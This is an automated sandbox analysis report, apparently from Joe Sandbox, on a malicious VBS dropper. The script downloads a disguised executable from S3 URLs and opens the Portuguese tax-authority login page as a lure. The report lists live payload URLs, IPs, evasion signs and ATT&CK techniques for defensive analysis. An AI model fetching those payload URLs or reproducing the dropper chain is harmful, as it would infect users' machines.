Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Files-
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2178582283.00000233BA5AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157185248.00000233BA5B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2178563168.00000233BC702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xboxtv/playoff.exea-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef

HIPS / PFW / Operating System Protection Evasion

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exeFile created: playoff.exe.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 3.5.216.50 443Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAPJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\xboxtv\playoff.exe "C:\users\public\xboxtv\playoff.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\xboxtv.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\xboxtv.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\xboxtv.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\xboxtv.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\xboxtv.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information21
Scripting		Valid Accounts1
Exploitation for Client Execution		21
Scripting		111
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
Registry Run Keys / Startup Folder		111
Process Injection		LSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
DLL Side-Loading		2
Obfuscated Files or Information		Security Account Manager13
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1597922 Sample: GuiaAT256201.vbs Startdate: 23/01/2025 Architecture: WINDOWS Score: 76 25 s3-r-w.eu-north-1.amazonaws.com 2->25 27 playoffchampions.s3.eu-north-1.amazonaws.com 2->27 43 Sigma detected: WScript or CScript Dropper 2->43 45 Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder 2->45 47 Sigma detected: Execution from Suspicious Folder 2->47 49 Sigma detected: Script Initiated Connection to Non-Local Network 2->49 8 wscript.exe 1 20 2->8         started        signatures3 process4 dnsIp5 35 s3-r-w.eu-north-1.amazonaws.com 3.5.216.50, 443, 49704 AMAZON-02US United States 8->35 21 C:\Users\Public\xboxtv\playoff.exe, PE32+ 8->21 dropped 23 C:\Users\Public\xboxtv.zip, Zip 8->23 dropped 51 System process connects to network (likely due to code injection or exploit) 8->51 53 Benign windows process drops PE files 8->53 55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->55 13 chrome.exe 8 8->13         started        16 playoff.exe 1 8->16         started        file6 signatures7 process8 dnsIp9 37 192.168.2.5, 443, 49499, 49703 unknown unknown 13->37 39 192.168.2.13 unknown unknown 13->39 41 3 other IPs or domains 13->41 18 chrome.exe 13->18         started        process10 dnsIp11 29 static.portaldasfinancas.gov.pt 62.28.254.209, 443, 49718, 49724 MEO-EMPRESASPT Portugal 18->29 31 www.acesso.gov.pt 62.28.254.215, 443, 49706, 49712 MEO-EMPRESASPT Portugal 18->31 33 www.google.com 142.250.185.196, 443, 49735, 50029 GOOGLEUS United States 18->33

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/0%Avira URL Cloudsafe
https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/CafeMusic.mpeg0%Avira URL Cloudsafe
https://info.portaldasfinancas.gov.pt/pt/quem_somos/privacidade/Pages/privacidade.aspx0%Avira URL Cloudsafe
https://playoffchampions.s3.eu-north-1.amazonaws.com/xboxtv.mpeg0%Avira URL Cloudsafe
https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/DanceMarine.mpeg0%Avira URL Cloudsafe
http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-pref0%Avira URL Cloudsafe
https://info.portaldasfinancas.gov.pt/pt/at/Pages/Encarregado_protecao_dados.aspx0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
static.portaldasfinancas.gov.pt
62.28.254.209
truefalse
    		high
    s3-r-w.eu-north-1.amazonaws.com
    		3.5.216.50
    		truefalse
      		high
      www.google.com
      		142.250.185.196
      		truefalse
        		high
        www.acesso.gov.pt
        		62.28.254.215
        		truefalse
          		high
          playoffchampions.s3.eu-north-1.amazonaws.com
          		unknown
          		unknownfalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://www.acesso.gov.pt/autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.14false
              		high
              https://www.acesso.gov.pt/autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.14false
                		high
                https://www.acesso.gov.pt/autentica_static/css/sa-custom.css?cb=5.2.14false
                  		high
                  https://static.portaldasfinancas.gov.pt/app/pfstatic_static/js/pf-footer.jsfalse
                    		high
                    https://www.acesso.gov.pt/autentica_static/js/smartresize.js?cb=5.2.14false
                      		high
                      https://www.acesso.gov.pt/autentica_static/css/bootstrap.min.css?cb=5.2.14false
                        		high
                        https://www.acesso.gov.pt/autentica_static/img/autenticacaogov.pngfalse
                          		high
                          https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.14false
                            		high
                            https://www.acesso.gov.pt/autentica_static/icons/favicon.icofalse
                              		high
                              https://www.acesso.gov.pt/autentica_static/js/footer/footer.js?cb=5.2.14false
                                		high
                                https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.14false
                                  		high
                                  https://www.acesso.gov.pt/autentica_static/js/capslock-login.js?cb=5.2.14false
                                    		high
                                    https://www.acesso.gov.pt/autentica_static/img/background.pngfalse
                                      		high
                                      https://www.acesso.gov.pt/autentica_static/css/tabs.css?cb=5.2.14false
                                        		high
                                        https://www.acesso.gov.pt/autentica_static/img/logo-at.pngfalse
                                          		high
                                          https://www.acesso.gov.pt/autentica_static/js/app.js?cb=5.2.14false
                                            		high
                                            https://playoffchampions.s3.eu-north-1.amazonaws.com/xboxtv.mpegtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.acesso.gov.pt/autentica_static/js/modernizr.js?cb=5.2.14false
                                              		high
                                              https://www.acesso.gov.pt/autentica_static/img/iconGovPt_20x20.pngfalse
                                                		high
                                                https://www.acesso.gov.pt/v2/loginForm?partID=PFAPfalse
                                                  		high
                                                  https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.14false
                                                    		high
                                                    https://www.acesso.gov.pt/autentica_static/pf/css/pf-main.css?cb=5.2.14false
                                                      		high
                                                      https://www.acesso.gov.pt/autentica_static/pf/css/footer.css?cb=5.2.14false
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://fontawesome.iochromecache_94.4.drfalse
                                                          		high
                                                          https://info.portaldasfinancas.gov.pt/pt/quem_somos/privacidade/Pages/privacidade.aspxchromecache_92.4.dr, chromecache_120.4.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/chromecache_100.4.dr, chromecache_113.4.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/CafeMusic.mpegplayoff.exe, 00000007.00000000.2223508151.00000000002C9000.00000020.00000001.01000000.0000000B.sdmp, playoff.exe, 00000007.00000003.2228095895.0000017A563EC000.00000004.00001000.00020000.00000000.sdmp, playoff.exe.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.acesso.gov.pt/v2/loginForm?partID=PFAPtCookiesgCjwscript.exe, 00000000.00000003.2053801050.00000233BA521000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.acesso.gov.pt/v2/loginForm?partID=PFAP86wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://jqueryvalidation.org/chromecache_117.4.dr, chromecache_108.4.drfalse
                                                                		high
                                                                http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefchromecache_96.4.dr, chromecache_103.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://fontawesome.io/licensechromecache_94.4.drfalse
                                                                  		high
                                                                  https://www.acesso.gov.pt/v2/loginForm?partID=PFAPcwscript.exe, 00000000.00000003.2050678399.00000233BA6FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/DanceMarine.mpegplayoff.exe, 00000007.00000000.2223508151.00000000002C9000.00000020.00000001.01000000.0000000B.sdmp, playoff.exe, 00000007.00000003.2228095895.0000017A563EC000.00000004.00001000.00020000.00000000.sdmp, playoff.exe.0.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.acesso.gov.pt/v2/loginForm?partID=PFAPQ60wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.acesso.gov.pt/v2/loginFowscript.exe, 00000000.00000003.2232386458.00000233BA6F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://getbootstrap.com)chromecache_93.4.dr, chromecache_88.4.dr, chromecache_109.4.drfalse
                                                                          		high
                                                                          https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_93.4.dr, chromecache_88.4.dr, chromecache_109.4.drfalse
                                                                            		high
                                                                            https://www.acesso.gov.pt/v2/loginForm?partID=PFAPL-wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.acesso.gov.pt/v2/loginForm?partID=PFAPpwscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.acesso.gov.pt/v2/loginForm?partID=PFAPC:wscript.exe, 00000000.00000003.2053993426.00000233BA572000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.acesso.gov.pt/v2/loginForm?partID=PFAP76Rwscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.acesso.gov.pt/v2/loginForm?partID=PFAP9wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://info.portaldasfinancas.gov.pt/pt/at/Pages/Encarregado_protecao_dados.aspxchromecache_92.4.dr, chromecache_120.4.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      62.28.254.209
                                                                                      		static.portaldasfinancas.gov.ptPortugal
                                                                                      		15525MEO-EMPRESASPTfalse
                                                                                      62.28.254.215
                                                                                      		www.acesso.gov.ptPortugal
                                                                                      		15525MEO-EMPRESASPTfalse
                                                                                      3.5.216.50
                                                                                      		s3-r-w.eu-north-1.amazonaws.comUnited States
                                                                                      		16509AMAZON-02USfalse
                                                                                      239.255.255.250
                                                                                      		unknownReserved
                                                                                      		unknownunknownfalse
                                                                                      142.250.185.196
                                                                                      		www.google.comUnited States
                                                                                      		15169GOOGLEUSfalse

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.5
                                                                                      192.168.2.13
                                                                                      192.168.2.23
                                                                                      192.168.2.14

                                                                                      General Information

                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                      Analysis ID:1597922
                                                                                      Start date and time:2025-01-23 19:06:16 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 5m 55s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:9
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:GuiaAT256201.vbs
                                                                                      Detection:MAL
                                                                                      Classification:mal76.evad.winVBS@18/69@11/9
                                                                                      EGA Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 0
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .vbs

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.18.3, 216.58.206.46, 173.194.76.84, 142.250.186.46, 142.250.184.238, 142.250.185.174, 142.250.186.138, 142.250.185.106, 142.250.181.234, 142.250.184.202, 216.58.212.170, 172.217.18.10, 142.250.185.74, 172.217.16.202, 216.58.212.138, 216.58.206.42, 172.217.18.106, 142.250.186.42, 142.250.184.234, 142.250.186.106, 172.217.23.106, 142.250.186.170, 217.20.57.41, 2.23.77.188, 172.217.18.14, 142.250.181.238, 142.250.185.78, 142.250.186.78, 216.58.212.142, 142.250.185.227, 142.250.185.206, 184.28.90.27, 4.175.87.197, 13.107.253.45
                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                      • Execution Graph export aborted for target playoff.exe, PID 8028 because there are no executed function
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      13:07:25API Interceptor2x Sleep call for process: playoff.exe modified